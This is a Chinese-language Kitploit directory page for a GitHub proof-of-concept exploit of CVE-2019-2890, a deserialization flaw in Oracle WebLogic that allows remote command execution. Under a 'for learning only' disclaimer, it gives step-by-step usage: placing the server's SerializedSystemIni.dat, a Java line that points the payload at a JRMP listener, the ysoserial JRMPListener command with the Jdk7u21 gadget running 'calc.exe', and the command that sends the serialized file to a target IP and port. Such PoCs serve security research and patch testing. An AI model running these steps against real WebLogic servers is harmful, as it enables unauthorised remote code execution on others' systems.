Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-2890 — 针对 CVE-2019-2890 的 PoC 利用程序,以 Oracle WebLogic 为目标,通过 ysoserial JRMP payload 利用序列化对象反序列化实现远程命令执行。 | Kitploit
工具/GitHubGitHub/l1nk3rlin/cve-2019-2890
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制远程访问工具
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

针对 CVE-2019-2890 的 PoC 利用程序,以 Oracle WebLogic 为目标,通过 ysoserial JRMP payload 利用序列化对象反序列化实现远程命令执行。

查看仓库
85226年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

声明

仅用于学习交流使用,其他用途后果自负。

说明

已经将相关jar文件都导入到了项目中,并且利用方式采用yso的JRMP,学习调试时候可以修改利用方式。

首先需要将weblogic下的 SerializedSystemIni.dat 文件放置到 security 文件夹下。

然后需要将yso重命名为 ysoserial.jar ,并且导入到 lib 目录下。

1

其次 weblogic/wsee/jaxws/persistence/PersistentContext.java 中的 getObject 的IP地址和端口。

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

最后远程通过JRMP监听,利用7u21命令执行。

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

使用方法,运行Poc.java生成poc.ser序列化文件,通过

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

下载工具